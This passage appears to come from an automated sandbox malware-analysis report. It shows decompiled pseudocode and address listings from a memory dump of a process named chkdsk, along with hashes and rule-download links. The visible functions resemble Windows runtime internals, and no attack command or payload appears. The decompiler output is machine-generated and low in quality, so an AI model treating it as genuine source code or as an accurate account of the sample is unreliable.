								}
							}
							break;
						}
						_v32 = _t331;
						__eflags = _t331;
						if(_t331 < 0) {
							__eflags = _t331 - 0xc0000100;
							if(_t331 == 0xc0000100) {
								_t296 = _a4;
								__eflags = _t296;
								if(_t296 != 0) {
									_v36 = _t296;
									__eflags =  *_t296 - _t324;
									if( *_t296 == _t324) {
										_t331 = 0xc0000100;
										goto L76;
									} else {
										_t312 =  *((intOrPtr*)(_v44 + 0x30));
										_t244 =  *((intOrPtr*)(_t312 + 0x10));
										__eflags =  *((intOrPtr*)(_t244 + 0x48)) - _t296;
										if( *((intOrPtr*)(_t244 + 0x48)) == _t296) {
											__eflags =  *(_t312 + 0x1c);
											if( *(_t312 + 0x1c) == 0) {
												L106:
												_t331 = E04DB2AE4( &_v36, _a8, _t287, _a16, _a20, _a24);
												_v32 = _t331;
												__eflags = _t331 - 0xc0000100;
												if(_t331 != 0xc0000100) {
													goto L69;
												} else {
													_t324 = 1;
													_t296 = _v36;
													goto L75;
												}
											} else {
												_t247 = E04D96600( *(_t312 + 0x1c));
												__eflags = _t247;
												if(_t247 != 0) {
													goto L106;
												} else {
													_t296 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t331 = E04DB2C50(_t296, _a8, _t287, _a16, _a20, _a24, _t324);
											L76:
											_v32 = _t331;
											goto L69;
										}
									}
									goto L108;
								} else {
									E04D9EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t331 = _a24;
									_t254 = E04DB2AE4( &_v36, _a8, _t287, _a16, _a20, _t331);
									_v32 = _t254;
									__eflags = _t254 - 0xc0000100;
									if(_t254 == 0xc0000100) {
										_v32 = E04DB2C50(_v36, _a8, _t287, _a16, _a20, _t331, 1);
									}
									_v8 = _t324;
									E04DB2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t240 = _t331;
					}
					L70:
					return E04DDD0D1(_t240);
				}
				L108:
			}


















































                                                      0x04db2584
                                                      0x04db2586
                                                      0x04db2590
                                                      0x04db2596
                                                      0x04db2597
                                                      0x04db2598
                                                      0x04db2599
                                                      0x04db259e
                                                      0x04db25a4
                                                      0x04db25a9
                                                      0x04db25ac
                                                      0x04db25ae
                                                      0x04db25b1
                                                      0x04db25b2
                                                      0x04db25b5
                                                      0x04db25b8
                                                      0x04db25bb
                                                      0x04db25bc
                                                      0x04db25bf
                                                      0x04db25c2
                                                      0x04db25c5
                                                      0x04db25c6
                                                      0x04db25cb
                                                      0x04db25ce
                                                      0x04db25d8
                                                      0x04db25db
                                                      0x04db25dd
                                                      0x04db25de
                                                      0x04db25e1
                                                      0x04db25e3
                                                      0x04db25e9
                                                      0x04db26da
                                                      0x04db26da
                                                      0x04db26dd
                                                      0x04db26e2
                                                      0x04df5b56
                                                      0x00000000
                                                      0x04db26e8
                                                      0x04db26f9
                                                      0x04db26fb
                                                      0x04db26fe
                                                      0x04db2700
                                                      0x04df5b60
                                                      0x00000000
                                                      0x04db2706
                                                      0x04db2706
                                                      0x04db270a
                                                      0x04db270a
                                                      0x04db270d
                                                      0x04db2713
                                                      0x04db2716
                                                      0x04db2718
                                                      0x04db271c
                                                      0x04db271e
                                                      0x04df5b6c
                                                      0x04df5b6f
                                                      0x04df5b7f
                                                      0x04df5b89
                                                      0x04df5b8e
                                                      0x04df5b93
                                                      0x04df5b96
                                                      0x04df5b9c
                                                      0x04df5ba0
                                                      0x04df5ba3
                                                      0x04df5bab
                                                      0x04df5bb0
                                                      0x04df5bb3
                                                      0x04df5bb3
                                                      0x04df5ba3
                                                      0x04db2724
                                                      0x04db2726
                                                      0x04db2729
                                                      0x04db272c
                                                      0x04db279d
                                                      0x04db279d
                                                      0x04db27a0
                                                      0x04db27a2
                                                      0x00000000
                                                      0x04db272e
                                                      0x04db272e
                                                      0x04db2731
                                                      0x04db2734
                                                      0x04db2734
                                                      0x04db2736
                                                      0x04df5bc1
                                                      0x04df5bc1
                                                      0x04df5bc4
                                                      0x00000000
                                                      0x04df5bca
                                                      0x04df5bca
                                                      0x04df5bcd
                                                      0x00000000
                                                      0x04df5bd3
                                                      0x00000000
                                                      0x04df5bd3
                                                      0x04df5bcd
                                                      0x04db273c
                                                      0x04db273c
                                                      0x04db2742
                                                      0x04db2747
                                                      0x04db274a
                                                      0x04db274d
                                                      0x04db2750
                                                      0x00000000
                                                      0x04db2756
                                                      0x04db2756
                                                      0x00000000
                                                      0x04db2902
                                                      0x04db2908
                                                      0x04db290b
                                                      0x00000000
                                                      0x04db2911
                                                      0x04db291c
                                                      0x04db2921
                                                      0x00000000
                                                      0x04db2921
                                                      0x00000000
                                                      0x00000000
                                                      0x04db2880
                                                      0x04db2887
                                                      0x04db288c
                                                      0x00000000
                                                      0x00000000
                                                      0x04db2805
                                                      0x04db280a
                                                      0x04db2814
                                                      0x04db2816
                                                      0x00000000
                                                      0x00000000
                                                      0x04db281e
                                                      0x04db2821
                                                      0x04db2823
                                                      0x00000000
                                                      0x04db2829
                                                      0x04db2829
                                                      0x04db2831
                                                      0x04db283c
                                                      0x04db283e
                                                      0x00000000
                                                      0x04db283e
                                                      0x00000000
                                                      0x00000000
                                                      0x04db284e
                                                      0x04db2850
                                                      0x04db2851
                                                      0x04db2854
                                                      0x04db2857
                                                      0x04db285a
                                                      0x04db285c
                                                      0x04db285d
                                                      0x00000000
                                                      0x00000000
                                                      0x04db275d
                                                      0x04db2761
                                                      0x00000000
                                                      0x04db2767
                                                      0x04db276e
                                                      0x04db2773
                                                      0x04db2773
                                                      0x04db2776
                                                      0x04db2778
                                                      0x04db277e
                                                      0x04db277e
                                                      0x04db2781
                                                      0x04db2781
                                                      0x04db2783
                                                      0x04db2784
                                                      0x00000000
                                                      0x00000000
                                                      0x04df5bd8
                                                      0x04df5bde
                                                      0x04df5be4
                                                      0x04df5be6
                                                      0x04df5be8
                                                      0x04df5be9
                                                      0x04df5bee
                                                      0x04df5bf8
                                                      0x04df5bff
                                                      0x04df5c01
                                                      0x04df5c04
                                                      0x04df5c07
                                                      0x04df5c0b
                                                      0x04df5c0d
                                                      0x04df5c0d
                                                      0x04df5c15
                                                      0x04df5c18
                                                      0x04df5c1b
                                                      0x04df5c1b
                                                      0x04df5c1e
                                                      0x00000000
                                                      0x00000000
                                                      0x04db28c3
                                                      0x04db28c8
                                                      0x04db28d2
                                                      0x04db28d4
                                                      0x04db28d8
                                                      0x04db28db
                                                      0x04df5c26
                                                      0x04df5c28
                                                      0x04df5c2d
                                                      0x04df5c2d
                                                      0x00000000
                                                      0x00000000
                                                      0x04df5c34
                                                      0x04df5c36
                                                      0x04df5c49
                                                      0x04df5c4e
                                                      0x04df5c54
                                                      0x04df5c5b
                                                      0x04df5c5d
                                                      0x04df5c60
                                                      0x04db2788
                                                      0x04db2788
                                                      0x04db278b
                                                      0x04db278e
                                                      0x04db278e
                                                      0x04db278e
                                                      0x04db2791
                                                      0x00000000
                                                      0x00000000
                                                      0x04db2756
                                                      0x04db2750
                                                      0x00000000
                                                      0x04db2794
                                                      0x04db2794
                                                      0x04db2795
                                                      0x04db2798
                                                      0x04db2798
                                                      0x00000000
                                                      0x04db2734
                                                      0x04db272c
                                                      0x04db2700
                                                      0x04db25ef
                                                      0x04db25ef
                                                      0x04db25ef
                                                      0x04db25f2
                                                      0x04db25f8
                                                      0x00000000
                                                      0x00000000
                                                      0x04db25fe
                                                      0x00000000
                                                      0x04db28e6
                                                      0x04db28ec
                                                      0x04db28ef
                                                      0x04db28f5
                                                      0x04db28f8
                                                      0x04db28f8
                                                      0x00000000
                                                      0x04db28f8
                                                      0x00000000
                                                      0x00000000
                                                      0x04db2866
                                                      0x04db2866
                                                      0x04db2876
                                                      0x04db2879
                                                      0x00000000
                                                      0x00000000
                                                      0x04db27e0
                                                      0x04db27e7
                                                      0x04db27e9
                                                      0x04db27eb
                                                      0x04df5afd
                                                      0x00000000
                                                      0x04df5afd
                                                      0x00000000
                                                      0x00000000
                                                      0x04db2633
                                                      0x04db2638
                                                      0x04db263b
                                                      0x04db263c
                                                      0x04db263e
                                                      0x04db2640
                                                      0x04db2642
                                                      0x04db2647
                                                      0x04db2649
                                                      0x04db264e
                                                      0x04db2650
                                                      0x04db2653
                                                      0x04db2659
                                                      0x04db26a2
                                                      0x04db26a7
                                                      0x04db26ac
                                                      0x04db26b2
                                                      0x04df5b11
                                                      0x04df5b15
                                                      0x04df5b17
                                                      0x00000000
                                                      0x04db26b8
                                                      0x04db26b8
                                                      0x04db26ba
                                                      0x04db27a6
                                                      0x04db27a6
                                                      0x04db27a9
                                                      0x04db27ab
                                                      0x04db27b9
                                                      0x04db27b9
                                                      0x04db27be
                                                      0x04db27c1
                                                      0x04db27c3
                                                      0x04db27c5
                                                      0x04db27c7
                                                      0x04df5c74
                                                      0x04df5c79
                                                      0x04df5c79
                                                      0x04db27c7
                                                      0x00000000
                                                      0x04db26c0
                                                      0x04db26c0
                                                      0x04db26c3
                                                      0x04db26c6
                                                      0x04db26c6
                                                      0x04db26c9
                                                      0x04db26c9
                                                      0x00000000
                                                      0x04db26c9
                                                      0x04db26ba
                                                      0x04db265b
                                                      0x04db265b
                                                      0x04db265e
                                                      0x04db2667
                                                      0x04db266d
                                                      0x04db2677
                                                      0x04db267c
                                                      0x04db267f
                                                      0x04db2681
                                                      0x04df5b49
                                                      0x04df5b4e
                                                      0x04db27cd
                                                      0x04db27d0
                                                      0x04db27d1
                                                      0x04db27d2
                                                      0x04db27d4
                                                      0x04db27dd
                                                      0x04db2687
                                                      0x04db2687
                                                      0x04db268a
                                                      0x04db268b
                                                      0x04db268e
                                                      0x04db268f
                                                      0x04db2691
                                                      0x04db2696
                                                      0x04db2698
                                                      0x04db269d
                                                      0x04db269f
                                                      0x00000000
                                                      0x04db269f
                                                      0x04db2681
                                                      0x00000000
                                                      0x00000000
                                                      0x04db2846
                                                      0x00000000
                                                      0x00000000
                                                      0x04db2605
                                                      0x04db260a
                                                      0x04db260c
                                                      0x04db2611
                                                      0x04db2616
                                                      0x04db2619
                                                      0x04db2619
                                                      0x04db261e
                                                      0x00000000
                                                      0x04db2624
                                                      0x04db2627
                                                      0x04db2627
                                                      0x00000000
                                                      0x00000000
                                                      0x04df5b1f
                                                      0x00000000
                                                      0x00000000
                                                      0x04db2894
                                                      0x04db289b
                                                      0x04db289d
                                                      0x04db28a1
                                                      0x04df5b2b
                                                      0x04df5b2e
                                                      0x04df5b2e
                                                      0x04db28a7
                                                      0x04db28a9
                                                      0x04df5b04
                                                      0x04df5b09
                                                      0x04df5b09
                                                      0x04df5b09
                                                      0x00000000
                                                      0x00000000
                                                      0x04df5b35
                                                      0x04df5b3c
                                                      0x04db28fb
                                                      0x04db28fb
                                                      0x04db26cc
                                                      0x04db26cc
                                                      0x04db26d0
                                                      0x00000000
                                                      0x04db26d2
                                                      0x04db26d2
                                                      0x00000000
                                                      0x04db26d2
                                                      0x00000000
                                                      0x00000000
                                                      0x04db25fe
                                                      0x04db292d
                                                      0x04db2930
                                                      0x04db2935
                                                      0x04db2937
                                                      0x04db293e
                                                      0x04db293f
                                                      0x04db2942
                                                      0x04db294a
                                                      0x04db294f
                                                      0x04db2957
                                                      0x04db2962
                                                      0x04db2963
                                                      0x04db296e
                                                      0x04db296f
                                                      0x04db2973
                                                      0x04db297a
                                                      0x04db297b
                                                      0x04db297e
                                                      0x04db297f
                                                      0x04db2980
                                                      0x04db2981
                                                      0x04db2982
                                                      0x04db2983
                                                      0x04db2984
                                                      0x04db2985
                                                      0x04db2986
                                                      0x04db2987
                                                      0x04db2988
                                                      0x04db2989
                                                      0x04db298a
                                                      0x04db298b
                                                      0x04db298c
                                                      0x04db298d
                                                      0x04db298e
                                                      0x04db298f
                                                      0x04db2990
                                                      0x04db2992
                                                      0x04db2997
                                                      0x04db29a3
                                                      0x04db29a6
                                                      0x04db29ab
                                                      0x04db29ad
                                                      0x04db29b0
                                                      0x04db29b2
                                                      0x04df5c80
                                                      0x04db29b8
                                                      0x04db29b8
                                                      0x04db29bb
                                                      0x04db29c0
                                                      0x04db29c5
                                                      0x04db29c6
                                                      0x04db29c6
                                                      0x04db29c9
                                                      0x04db29cb
                                                      0x00000000
                                                      0x00000000
                                                      0x04db29cd
                                                      0x04db29d0
                                                      0x04db29d9
                                                      0x04db29db
                                                      0x04db29dd
                                                      0x04db2a7f
                                                      0x04db2a84
                                                      0x04db2a87
                                                      0x04db2a89
                                                      0x04df5ca1
                                                      0x04df5ca3
                                                      0x00000000
                                                      0x04db2a8f
                                                      0x04db2a8f
                                                      0x00000000
                                                      0x04db2a8f
                                                      0x00000000
                                                      0x04db29e3
                                                      0x04db29e3
                                                      0x04db29e3
                                                      0x00000000
                                                      0x04db29e3
                                                      0x04db29dd
                                                      0x00000000
                                                      0x04db29db
                                                      0x04db29e6
                                                      0x04db29e9
                                                      0x04db29eb
                                                      0x04db29ed
                                                      0x04db29f3
                                                      0x04db29f5
                                                      0x04db29f8
                                                      0x04db29fa
                                                      0x04db2a97
                                                      0x04db2a9a
                                                      0x04db2a9d
                                                      0x04db2add
                                                      0x00000000
                                                      0x04db2a9f
                                                      0x04db2aa2
                                                      0x04db2aa5
                                                      0x04db2aa8
                                                      0x04db2aab
                                                      0x04df5cab
                                                      0x04df5caf
                                                      0x04df5cc5
                                                      0x04df5cda
                                                      0x04df5cdc
                                                      0x04df5cdf
                                                      0x04df5ce5
                                                      0x00000000
                                                      0x04df5ceb
                                                      0x04df5ced
                                                      0x04df5cee
                                                      0x00000000
                                                      0x04df5cee
                                                      0x04df5cb1
                                                      0x04df5cb4
                                                      0x04df5cb9
                                                      0x04df5cbb
                                                      0x00000000
                                                      0x04df5cbd
                                                      0x04df5cbd
                                                      0x00000000
                                                      0x04df5cbd
                                                      0x04df5cbb
                                                      0x04db2ab1
                                                      0x04db2ab1
                                                      0x04db2ac4
                                                      0x04db2ac6
                                                      0x04db2ac6
                                                      0x00000000
                                                      0x04db2ac6
                                                      0x04db2aab
                                                      0x00000000
                                                      0x04db2a00
                                                      0x04db2a09
                                                      0x04db2a0e
                                                      0x04db2a21
                                                      0x04db2a24
                                                      0x04db2a35
                                                      0x04db2a3a
                                                      0x04db2a3d
                                                      0x04db2a42
                                                      0x04db2a59
                                                      0x04db2a59
                                                      0x04db2a5c
                                                      0x04db2a5f
                                                      0x04db2a5f
                                                      0x04db29fa
                                                      0x04db29f3
                                                      0x04db2a64
                                                      0x04db2a64
                                                      0x04db2a6b
                                                      0x04db2a6b
                                                      0x04db2a6d
                                                      0x04db2a72
                                                      0x04db2a72
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PATH
                                                      • API String ID: 0-1036084923
                                                      • Opcode ID: dfe8d628aa060e5f5760c3ab679ce42c4b2b4a1c102026a67e31c59b0ca4b1bf
                                                      • Instruction ID: b3d48e8d66cf4a20a659e32288d25b3e61879b2fbd815f20daa72e809e9e4cbb
                                                      • Opcode Fuzzy Hash: dfe8d628aa060e5f5760c3ab679ce42c4b2b4a1c102026a67e31c59b0ca4b1bf
                                                      • Instruction Fuzzy Hash: 86C1AF72E00219EFDB25DF99D884BEDB7B1FF48714F054069E882AB250E774B941CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04D82D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 63%
                                                      			E04D82D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x4e75350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x4e77bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E04DC97C0();
				}
				if( *0x4e779c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x4e779c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E04DB1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E04DA7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E04E1FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E04DC9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E04DBE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L04DDDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x4e76901;
								_push(_t109);
								_v52 = _t98;
								if( *0x4e76901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E04DC9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E04DC95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E04DA7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E04DA7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E04E07016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E04E1FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x4e75350;
							if(_t109 != 0x4e75350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E04E1FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E04E15720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                      0x04d82d8a
                                                      0x04d82d8a
                                                      0x04d82d92
                                                      0x04d82d96
                                                      0x04d82d9e
                                                      0x04d82da0
                                                      0x04d82da3
                                                      0x04d82da5
                                                      0x04d82da8
                                                      0x04d82dab
                                                      0x04d82db2
                                                      0x04ddf9aa
                                                      0x04ddf9ab
                                                      0x04ddf9ae
                                                      0x04ddf9ae
                                                      0x04d82db8
                                                      0x04d82dc2
                                                      0x04ddf9b9
                                                      0x04ddf9be
                                                      0x04ddf9bf
                                                      0x04ddf9bf
                                                      0x04d82dcf
                                                      0x04ddf9c9
                                                      0x04d82dd5
                                                      0x04d82dd5
                                                      0x04d82dd5
                                                      0x04d82dde
                                                      0x04d82de1
                                                      0x04d82e70
                                                      0x04d82e72
                                                      0x04d82e72
                                                      0x04d82de7
                                                      0x04d82deb
                                                      0x04d82e7c
                                                      0x04d82e83
                                                      0x04d82e85
                                                      0x04d82e8b
                                                      0x04d82e8d
                                                      0x04d82e92
                                                      0x04d82e92
                                                      0x04d82e85
                                                      0x04d82df1
                                                      0x04d82df7
                                                      0x04d82df9
                                                      0x04d82df9
                                                      0x04d82dfc
                                                      0x04d82dff
                                                      0x04d82e02
                                                      0x00000000
                                                      0x04d82e05
                                                      0x04d82e0c
                                                      0x04ddf9d9
                                                      0x04d82e12
                                                      0x04d82e12
                                                      0x04d82e12
                                                      0x04d82e1a
                                                      0x04ddf9e3
                                                      0x04ddf9e9
                                                      0x04ddf9f0
                                                      0x04ddf9f6
                                                      0x04ddf9f8
                                                      0x04ddf9f8
                                                      0x04ddf9f0
                                                      0x04d82e23
                                                      0x04ddfa02
                                                      0x04ddfa03
                                                      0x04ddfa05
                                                      0x04ddfa06
                                                      0x00000000
                                                      0x04d82e29
                                                      0x04d82e29
                                                      0x04d82e2e
                                                      0x04d82e34
                                                      0x04d82e3e
                                                      0x00000000
                                                      0x00000000
                                                      0x04d82e44
                                                      0x04d82e47
                                                      0x04d82e4d
                                                      0x00000000
                                                      0x00000000
                                                      0x04d82e4f
                                                      0x04d82e54
                                                      0x00000000
                                                      0x00000000
                                                      0x04d82e5a
                                                      0x04d82e5f
                                                      0x04d82e9a
                                                      0x04d82ea4
                                                      0x04d82ea5
                                                      0x04d82ea8
                                                      0x04d82eaf
                                                      0x04d82eb2
                                                      0x04d82eb5
                                                      0x04ddfae9
                                                      0x04ddfaeb
                                                      0x04ddfaed
                                                      0x04ddfaef
                                                      0x04ddfaf7
                                                      0x04ddfaf8
                                                      0x04ddfafd
                                                      0x04ddfaff
                                                      0x04ddfb04
                                                      0x04ddfb04
                                                      0x04ddfaff
                                                      0x04d82ec0
                                                      0x04d82ec4
                                                      0x04d82ec6
                                                      0x04d82ec8
                                                      0x04ddfb14
                                                      0x04ddfb18
                                                      0x04ddfb1e
                                                      0x04ddfb21
                                                      0x04ddfb21
                                                      0x04d82ece
                                                      0x04d82ece
                                                      0x04d82ece
                                                      0x04d82ed7
                                                      0x04d82e61
                                                      0x04d82e63
                                                      0x04ddfa6b
                                                      0x04ddfa71
                                                      0x04ddfa76
                                                      0x04ddfa78
                                                      0x04ddfa8a
                                                      0x04ddfa7a
                                                      0x04ddfa83
                                                      0x04ddfa83
                                                      0x04ddfa8f
                                                      0x04ddfa91
                                                      0x04ddfa97
                                                      0x04ddfa9d
                                                      0x04ddfaa4
                                                      0x04ddfaaa
                                                      0x04ddfaaf
                                                      0x04ddfab1
                                                      0x04ddfac3
                                                      0x04ddfab3
                                                      0x04ddfabc
                                                      0x04ddfabc
                                                      0x04ddfac8
                                                      0x04ddfacb
                                                      0x04ddfadf
                                                      0x04ddfadf
                                                      0x04ddfacb
                                                      0x04ddfaa4
                                                      0x04ddfa91
                                                      0x04d82e6f
                                                      0x04d82e6f
                                                      0x04d82e5f
                                                      0x04ddfa13
                                                      0x04ddfa15
                                                      0x04ddfa17
                                                      0x04ddfa1f
                                                      0x04ddfa21
                                                      0x04ddfa22
                                                      0x04ddfa25
                                                      0x04ddfa28
                                                      0x04ddfa2f
                                                      0x04ddfa2f
                                                      0x04ddfa2a
                                                      0x04ddfa2a
                                                      0x04ddfa2a
                                                      0x04ddfa31
                                                      0x04ddfa34
                                                      0x04ddfa36
                                                      0x04ddfa3c
                                                      0x04ddfa3e
                                                      0x04ddfa41
                                                      0x04ddfa43
                                                      0x04ddfa45
                                                      0x04ddfa45
                                                      0x04ddfa41
                                                      0x04ddfa3c
                                                      0x04ddfa4a
                                                      0x04ddfa4f
                                                      0x04ddfa51
                                                      0x04ddfa53
                                                      0x04ddfa56
                                                      0x04ddfa5b
                                                      0x04ddfa5e
                                                      0x00000000
                                                      0x04ddfa5e
                                                      0x04d82e23

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RTL: Re-Waiting
                                                      • API String ID: 0-316354757
                                                      • Opcode ID: 10d22954fe052abf6489f59287cfa4070e8b782d6aaadd24cb944443302d5585
                                                      • Instruction ID: 811a10aa0d92b5263413af8299a01be53ebe35f62a114acf5ffae1e609c0548d
                                                      • Opcode Fuzzy Hash: 10d22954fe052abf6489f59287cfa4070e8b782d6aaadd24cb944443302d5585
                                                      • Instruction Fuzzy Hash: E2610231B00644AFEB22EF68C880B7E77A5FB44728F1446ADE8529B2D0D774F9418791
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04E50EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 80%
                                                      			E04E50EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E04E4FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E04E51074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E04DC9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E04E4A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E04E4A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x4e78b04 >> 0x14) + (_v44 -  *0x4e78b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E04DA7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E04E4138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E04DA7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
